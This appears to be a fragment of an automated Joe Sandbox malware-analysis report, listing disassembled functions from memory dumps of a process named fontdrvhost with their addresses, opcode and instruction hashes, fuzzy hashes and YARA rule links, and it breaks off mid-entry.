                                                                                                                    • Opcode Fuzzy Hash: d71f91e2e835abecfea5e4f0ba85d64d0e321eb78f78bf8e6aa98e64a2dbe1d2
                                                                                                                    • Instruction Fuzzy Hash: ADE0657190E7C04FC716963888684547FA0EF6721174A41EEC145CF1A3DA2D8885CB01
                                                                                                                    Function 00007FFD34593129 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 8493884666dc4495784bf642fb0ac18361169cffd7cf1fa79f62da1dcb6f9ef9
                                                                                                                    • Instruction ID: 5c093b810b37c9ef895bb1ba65b2939c0a8c9fe65f3e1222c45bcbc83a90ed69
                                                                                                                    • Opcode Fuzzy Hash: 8493884666dc4495784bf642fb0ac18361169cffd7cf1fa79f62da1dcb6f9ef9
                                                                                                                    • Instruction Fuzzy Hash: 64E06D71A8E7C44FC71AEA348869454BFA0EF6721174A42EFC145CF1A3EA2D8885CB01
                                                                                                                    Function 00007FFD3459A719 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 6fb1f855709a8178938af368ebb7aa2d88bd99c434803adf40655ea3f3de48b3
                                                                                                                    • Instruction ID: 794fcf4b060ee13c197552fed768c3636b1d405bf0ebf974696a2e3ad077a457
                                                                                                                    • Opcode Fuzzy Hash: 6fb1f855709a8178938af368ebb7aa2d88bd99c434803adf40655ea3f3de48b3
                                                                                                                    • Instruction Fuzzy Hash: 2EE0657150E7C44FC716973448694547FB0EF6720174A45EEC145CF1A3EA2E8885C701
                                                                                                                    Function 00007FFD345983B9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 0b95c9cc8f2145e63a0b8746f5fa85fc54f13d4c9488f68181c3fc72e01284e7
                                                                                                                    • Instruction ID: 8686edcc80d0f43b1fa7416d12e5bcff0b5be9f0b900bf1eaf9d4ecd295c0766
                                                                                                                    • Opcode Fuzzy Hash: 0b95c9cc8f2145e63a0b8746f5fa85fc54f13d4c9488f68181c3fc72e01284e7
                                                                                                                    • Instruction Fuzzy Hash: 82E01A7294E3C04FCB16AB3488668553FB0EE6721078A54EEC189CF1B3E72D9849C711
                                                                                                                    Function 00007FFD34573F99 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 59b7dfc1d740e6117499110eec08b7c4ad22f7be598671c81746b1a3f00d1ce2
                                                                                                                    • Instruction ID: 89e13b9c939c91605094901d6f6368b7df9877aea4a6b4545442dbefaf09ffee
                                                                                                                    • Opcode Fuzzy Hash: 59b7dfc1d740e6117499110eec08b7c4ad22f7be598671c81746b1a3f00d1ce2
                                                                                                                    • Instruction Fuzzy Hash: B6E0ED7194F3C04FCB469B3488AA8443F60EE6721078A41EEC185CF1A3D62D9845C712
                                                                                                                    Function 00007FFD34591F89 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: a2d9e6551860d0a022f4264a78223f542a21507207b1aae34f95fc7b7e6f4d76
                                                                                                                    • Instruction ID: d368485407703f938557a42240569a30ddd2846b1d5ddaca32f74290fae11e74
                                                                                                                    • Opcode Fuzzy Hash: a2d9e6551860d0a022f4264a78223f542a21507207b1aae34f95fc7b7e6f4d76
                                                                                                                    • Instruction Fuzzy Hash: F5E09A6294F3C44FCB06EB3888A98443FA0EE6720078A00EED086CF1A3E62D8849C700
                                                                                                                    Function 00007FFD3459AC19 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 8c63e64de0b6acd48032c9ef932c24801679fb2308512897eb2faed1363e4abd
                                                                                                                    • Instruction ID: aaf28ed586ada2a1745cc8b462ed04d5c18caa4af01a01de5f28a75e40d2cf29
                                                                                                                    • Opcode Fuzzy Hash: 8c63e64de0b6acd48032c9ef932c24801679fb2308512897eb2faed1363e4abd
                                                                                                                    • Instruction Fuzzy Hash: F9E0E5A194E3D44FCB16AB7488668453FA1AE6B21078B45EEC18ACF1A3E62D9849C711
                                                                                                                    Function 00007FFD3459B148 Relevance: .2, Instructions: 220COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 78527ccbf340a5d2fc98f99a4102f5d5e084b9dfe07e6a39651e7bcf83ecdf45
                                                                                                                    • Instruction ID: 419888e88f037c26e0eab62f4d79919eb0006101189dc1f90cb35a7299b2738d
                                                                                                                    • Opcode Fuzzy Hash: 78527ccbf340a5d2fc98f99a4102f5d5e084b9dfe07e6a39651e7bcf83ecdf45
                                                                                                                    • Instruction Fuzzy Hash: 95611562F0D9994FFBAADB2884E52A87BE1FF56310F4801BAD54DC31C6DD2CAC419781
                                                                                                                    Function 00007FFD345925B8 Relevance: .1, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aab3a6068a8f44110f06b9d2a693272400fef57ba0974608d3a0334493b6e509
                                                                                                                    • Instruction ID: 568c2c938a12beef8f45b4ff3272492f15d8290fa1848bb915b0b0eda29b4048
                                                                                                                    • Opcode Fuzzy Hash: aab3a6068a8f44110f06b9d2a693272400fef57ba0974608d3a0334493b6e509
                                                                                                                    • Instruction Fuzzy Hash: 1741F632F0CA594FEBA9DB58C4A47A977E1EB95320F04057AE40DD72D1CE2C6C84CB81
                                                                                                                    Function 00007FFD34560908 Relevance: .1, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70b39af699e79c17fd18832147968019b6e7dd1b1b2a1a1ad00ae19ae8ffb0f7
                                                                                                                    • Instruction ID: 05a90d4d70d8b2052adf006a9099d1ea44fe35d62e3abbf4947dfb527d74df3a
                                                                                                                    • Opcode Fuzzy Hash: 70b39af699e79c17fd18832147968019b6e7dd1b1b2a1a1ad00ae19ae8ffb0f7
                                                                                                                    • Instruction Fuzzy Hash: C321073170DC184FE768EA0CE88ADB973D1EF9A32131111BAE58EC7166E915FC8287C1
                                                                                                                    Function 00007FFD34561171 Relevance: .1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 96ba064f7ace26ab98f5533628921627f7a84394eb758da63b54b1a08a9ee2ab
                                                                                                                    • Instruction ID: 1336d8de719215bbf9e2f45b9fc83dd87e6c5d2196f3940dce0e9b2532481136
                                                                                                                    • Opcode Fuzzy Hash: 96ba064f7ace26ab98f5533628921627f7a84394eb758da63b54b1a08a9ee2ab
                                                                                                                    • Instruction Fuzzy Hash: D3317231A0C68A8FDB46EB64C8A59B97BF1EF1B310B0805FBD049D71A3DA2C9845CB51
                                                                                                                    Function 00007FFD34560C25 Relevance: .1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 81ee992d48ce40efb8b56e2b80662a6d8814d1dede73db94a8983a1e71899b25
                                                                                                                    • Instruction ID: 8e6dbb530fc6496405b9985901f6bca5b991d77022cc67ebc2ec0e575901d0be
                                                                                                                    • Opcode Fuzzy Hash: 81ee992d48ce40efb8b56e2b80662a6d8814d1dede73db94a8983a1e71899b25
                                                                                                                    • Instruction Fuzzy Hash: 7721B127F0D6899FE713A76898610EDBB60EF53330F1452B2D148CA192DA2C69469681
                                                                                                                    Function 00007FFD345646FE Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2cd324d9f0fcbe24f5ec4be7d69cc0d41fa31b05318bfb7aeffe34a1140a2ef8
                                                                                                                    • Instruction ID: bfc2cdc866be95d5a932126b1e5b8a49613291bbe1902d7103a215f36ff305fc
                                                                                                                    • Opcode Fuzzy Hash: 2cd324d9f0fcbe24f5ec4be7d69cc0d41fa31b05318bfb7aeffe34a1140a2ef8
                                                                                                                    • Instruction Fuzzy Hash: F0216831E0C82E4EEB95EB18D8A46B862E1FF57321F5421B9D54EE3292DF2C6C419744
                                                                                                                    Function 00007FFD345608F8 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction ID: 5259cad82f6ded46ae330144746009d48002be112cdc8c684a468471eea4e256
                                                                                                                    • Opcode Fuzzy Hash: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction Fuzzy Hash: F501F732F4E92D0B9669D41D989A936B3C2DBCBB307152279E98FC3245DD28AC5356C0
                                                                                                                    Function 00007FFD34560C38 Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e26cd31a007bd143943e23dd972c97510eb7acdbfa02cbfefbe7b7e9c8eae5bc
                                                                                                                    • Instruction ID: 6201d993d8fc003ef434820ecf6f20fed1ae0bc34c3b8ca029e66b1ddafab57d
                                                                                                                    • Opcode Fuzzy Hash: e26cd31a007bd143943e23dd972c97510eb7acdbfa02cbfefbe7b7e9c8eae5bc
                                                                                                                    • Instruction Fuzzy Hash: AE11A036F0E68D9FF713DB2888A11ADBFA0EF43720F1555B2C144DB192EA3C5A469781
                                                                                                                    Function 00007FFD34560C48 Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8cb90daa4278aadba33b2ae909e710c06c14e580c5852a5b5d00613605b38984
                                                                                                                    • Instruction ID: 41562da05579added6d87a0087471974e0f594298f5713fbf2fa797b637c9cab
                                                                                                                    • Opcode Fuzzy Hash: 8cb90daa4278aadba33b2ae909e710c06c14e580c5852a5b5d00613605b38984
                                                                                                                    • Instruction Fuzzy Hash: 15016936E0D2899FEB12DB6888A009DBFB0AF43320F1551B6C544DB192EA3C5A45EB81
                                                                                                                    Function 00007FFD3456480A Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f859a5656836d77494a98f94a1655e68e525d03b7fd17e3130365e9a7ebba587
                                                                                                                    • Instruction ID: 402209cd714baf1f9c6315894657b9ddb7ed46ae0655a2723fb04b5860e3d389
                                                                                                                    • Opcode Fuzzy Hash: f859a5656836d77494a98f94a1655e68e525d03b7fd17e3130365e9a7ebba587
                                                                                                                    • Instruction Fuzzy Hash: BA016D31F0C41A4FEA99FB2894A46B862D2EF57321F0550B5D54ED3292DE2CAC429644
                                                                                                                    Function 00007FFD345744DF Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a60b487ac9dc80aef4c7dc216361cada9875268a70e7e10dab817302f42a9065
                                                                                                                    • Instruction ID: 70de804c1a65ca93f0e52f2cbaf82cd4dc1e6bea2e85da439315c936527989d5
                                                                                                                    • Opcode Fuzzy Hash: a60b487ac9dc80aef4c7dc216361cada9875268a70e7e10dab817302f42a9065
                                                                                                                    • Instruction Fuzzy Hash: 46018F71F0C40B8BFB55AB84C8A46BE7BE4EF42306F004536D655D62D4CF7CA9419B80
                                                                                                                    Function 00007FFD34560C50 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1148d6377518ce851e27891ff249282026dafd9fb6c473c557b6f80bfa0906b1
                                                                                                                    • Instruction ID: 2daa9ec87ee28ae2cbba66ac538e2116de47b4015cf53b187475cbab50b52308
                                                                                                                    • Opcode Fuzzy Hash: 1148d6377518ce851e27891ff249282026dafd9fb6c473c557b6f80bfa0906b1
                                                                                                                    • Instruction Fuzzy Hash: CA015A35E0D3899FEB12DB6888A409DBFB0AF03320F1451E6C544DB192EA3C5A44E741
                                                                                                                    Function 00007FFD345647D6 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction ID: 8763f95ddf90e4aea5c17e129fe925895bd5189fe5287db146f6a03a5ebaa79a
                                                                                                                    • Opcode Fuzzy Hash: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction Fuzzy Hash: 17F05431F0C4294AEB96EA14D8A46B86391EF57331F1421B9D94ED31D2CE2C6D835648
                                                                                                                    Function 00007FFD3459AB89 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e2284ba2e2f83360b54e2af326e0c6aeca67fbee903495846284ba7d7edba427
                                                                                                                    • Instruction ID: 53ad634fe0f8278ef28ac9545c6f2c0681dfdd970f46db38c0805c17f98cb0a3
                                                                                                                    • Opcode Fuzzy Hash: e2284ba2e2f83360b54e2af326e0c6aeca67fbee903495846284ba7d7edba427
                                                                                                                    • Instruction Fuzzy Hash: 80F0E521B0CBC40FC76A963D48A50617FF1DB9B21234A02FFC586CB2A3ED58EC868341
                                                                                                                    Function 00007FFD34574C20 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
                                                                                                                    • Instruction ID: 58ead995a69b421613d6428f87f2f335a6dfe4ccacc121e5ab5997ab40af4249
                                                                                                                    • Opcode Fuzzy Hash: c3e7b14d706b0bb96c290e7903d6db0490709abddbd41da37acc68952f82bbc0
                                                                                                                    • Instruction Fuzzy Hash: CEF03730F0C5178BE71A9A089C906B57292FF57312B118175D59AC21CADE3CE851A784
                                                                                                                    Function 00007FFD3456393E Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34560000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34560000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction ID: 90851bd60e6674cc9f421617cbf7425d049d199c3d12c1ca61b2ee90d0651e7c
                                                                                                                    • Opcode Fuzzy Hash: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction Fuzzy Hash: 4DF01C31E0C0064BFB959644C4A0BBA33A5DF56320F181079DA4ED32C1DD2CA9419709
                                                                                                                    Function 00007FFD345799FA Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d4160f7d7d45aa6afc0f65b8701cdcb5325b32ebcc20e93dbe3175103bd4169
                                                                                                                    • Instruction ID: 5fe61b2fd74f5c4edb89fdd7b7305db599876668cb0338d510344d5334f49575
                                                                                                                    • Opcode Fuzzy Hash: 3d4160f7d7d45aa6afc0f65b8701cdcb5325b32ebcc20e93dbe3175103bd4169
                                                                                                                    • Instruction Fuzzy Hash: 03F0A031E0C51D8FEB91EF04C890BA933A2EB05310F6182B6D90CD72D2DE3CAE009B80
                                                                                                                    Function 00007FFD3459DB99 Relevance: .0, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c0b67b36310c943b4f89911a8ed630009b31e52bda9fefea2284e4cfb7e695b0
                                                                                                                    • Instruction ID: aaae7b56b049d69ffe1de3f10b6d7e0f53bf70c582e664d72295edb4e0bb8510
                                                                                                                    • Opcode Fuzzy Hash: c0b67b36310c943b4f89911a8ed630009b31e52bda9fefea2284e4cfb7e695b0
                                                                                                                    • Instruction Fuzzy Hash: FEE01A6294E7C04FCB4B9B3588A98843FB0AE5722174A40EBC185CF5A3D61D9849C712
                                                                                                                    Function 00007FFD34575658 Relevance: .0, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
                                                                                                                    • Instruction ID: 72573e119026f9aefd43365c2521c28195831e44b4f8615d7e0408690d03129b
                                                                                                                    • Opcode Fuzzy Hash: 7e3852c7be42877991b74dc0ef8482ab11ca37e0199196fea86171960c8f4743
                                                                                                                    • Instruction Fuzzy Hash: C3D05E30B6090D4B8B5CA62D8468430B3D1E7AA2067D45278940BC2285ED29ECC68B80
                                                                                                                    Function 00007FFD34573F20 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                                                    Function 00007FFD3459A660 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2382413565.00007FFD34591000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34591000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd34591000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Function 00007FFD34597B29 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
